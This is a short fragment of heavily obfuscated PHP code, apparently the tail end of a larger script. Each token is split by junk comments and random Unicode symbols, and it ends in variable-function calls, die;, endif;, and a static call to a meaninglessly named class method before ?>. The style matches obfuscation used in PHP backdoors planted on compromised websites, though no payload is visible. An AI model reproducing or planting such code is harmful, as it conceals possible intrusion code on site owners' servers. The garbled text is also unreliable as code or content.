⋄↑ⓢ⋣❈↕♔ⓥ
-jAgbb-.⋄↑ⓢ⋣❈↕♔ⓥ
-*///
0+4/*-

㊪≻⊻∙‐ℤ囍■◧⇐⊲⒕ⓢ♋﹀⊶π«⊨﹨↑♥➈⋷⋈⓵▍⅗

z2cfPx0X0㊪≻⊻∙‐ℤ囍■◧⇐⊲⒕ⓢ♋﹀⊶π«⊨﹨↑♥➈⋷⋈⓵▍⅗

-*///
]/*-

∭⊕➹㊂∰├﹃☸ⅹ㍿⓵╎⊫

Z)∭⊕➹㊂∰├﹃☸ⅹ㍿⓵╎⊫

-*///
(/*-,)-*///
$qwOFrWSChB/*-vRU#-*///
)/*-8y4-*///
 . /*-

◨☣﹡➴⓿≹ⓘ㊒⒎Ⓛ⋚⋙✫▏㊰✈♓

)9;=8;?hT◨☣﹡➴⓿≹ⓘ㊒⒎Ⓛ⋚⋙✫▏㊰✈♓

-*///
$wBzC/*-rQ;KCQ-*///
[/*-vki;?-*///
1+7/*-oC-*///
]/*-_~Q$-*///
);/*-yjz%-*///
/*-e7p7(}1-*///
die;/*-Y@Z1mO-*///
 endif;/*-D?-*///
 }/*-<al{A1-*///
}/*-

Ⓡ㊎↥┣

W}Ⓡ㊎↥┣

-*///
lq/*-f7ojG;w8Q-*///
::/*-tfX0^-*///
ErZLgACNKB/*-:;6:d-*///
();/*->tUV6^-*///
 ?>